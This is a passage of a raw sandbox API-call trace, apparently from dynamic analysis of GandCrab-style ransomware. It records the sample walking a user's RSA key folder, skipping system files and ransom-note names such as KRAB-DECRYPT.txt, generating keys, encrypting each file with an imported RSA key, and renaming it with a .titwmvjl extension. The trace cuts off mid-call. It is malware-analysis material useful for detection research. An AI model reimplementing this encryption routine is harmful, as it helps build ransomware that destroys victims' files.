FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5033f8 [0071.822] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.822] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0071.823] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.823] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.823] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0071.823] lstrcmpW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2=".") returned 1 [0071.823] lstrcmpW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="..") returned 1 [0071.823] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b" [0071.823] lstrlenW (lpString=".titwmvjl") returned 9 [0071.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.823] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.823] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b.titwmvjl") returned 183 [0071.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="desktop.ini") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="autorun.inf") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntuser.dat") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="iconcache.db") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="bootsect.bak") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="boot.ini") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntuser.dat.log") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="thumbs.db") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="KRAB-DECRYPT.html") returned -1 [0071.823] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="CRAB-DECRYPT.html") returned -1 [0071.824] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.824] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="CRAB-DECRYPT.txt") returned -1 [0071.824] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntldr") returned -1 [0071.824] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="NTDETECT.COM") returned -1 [0071.824] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="Bootfont.bin") returned -1 [0071.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.824] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.824] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0071.824] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0071.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.824] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0071.825] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.825] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.825] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.825] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0071.825] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.826] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.826] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.826] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.826] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0071.826] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.827] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.827] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.827] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0071.827] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.827] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.827] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.827] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.827] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0071.828] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.828] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503438) returned 1 [0071.828] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.828] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0071.828] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.828] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0071.829] GetLastError () returned 0x0 [0071.829] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.829] CryptDestroyKey (hKey=0x503438) returned 1 [0071.829] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.829] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.829] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.829] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0071.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.830] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5034b8) returned 1 [0071.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.830] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0071.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.830] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0071.830] GetLastError () returned 0x0 [0071.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.831] CryptDestroyKey (hKey=0x5034b8) returned 1 [0071.831] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.831] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.831] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.831] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.832] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x35, lpOverlapped=0x0) returned 1 [0071.839] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffffcb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.839] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x35, lpOverlapped=0x0) returned 1 [0071.843] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.843] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0071.845] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.849] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.849] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.850] CloseHandle (hObject=0x2d4) returned 1 [0071.851] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b.titwmvjl"), dwFlags=0x1) returned 1 [0071.851] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.852] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0071.852] lstrcmpW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2=".") returned 1 [0071.852] lstrcmpW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="..") returned 1 [0071.852] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b" [0071.852] lstrlenW (lpString=".titwmvjl") returned 9 [0071.852] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.852] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.852] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b.titwmvjl") returned 183 [0071.852] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.852] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.852] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="desktop.ini") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="autorun.inf") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntuser.dat") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="iconcache.db") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="bootsect.bak") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="boot.ini") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntuser.dat.log") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="thumbs.db") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="KRAB-DECRYPT.html") returned -1 [0071.852] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="CRAB-DECRYPT.html") returned -1 [0071.853] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.853] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="CRAB-DECRYPT.txt") returned -1 [0071.853] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntldr") returned -1 [0071.853] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="NTDETECT.COM") returned -1 [0071.853] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="Bootfont.bin") returned -1 [0071.853] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0071.853] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.853] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0071.854] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0071.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.854] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0071.854] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.855] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.855] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.855] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0071.855] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.855] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.855] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.855] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.855] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0071.856] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.856] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.856] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.856] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0071.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.856] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.856] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.856] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0071.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.857] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503638) returned 1 [0071.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.857] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0071.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.857] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0071.858] GetLastError () returned 0x0 [0071.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.858] CryptDestroyKey (hKey=0x503638) returned 1 [0071.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.858] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.858] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0071.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.859] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0071.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.859] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0071.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.859] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0071.859] GetLastError () returned 0x0 [0071.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.860] CryptDestroyKey (hKey=0x503738) returned 1 [0071.860] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.860] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.860] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.860] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.860] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, 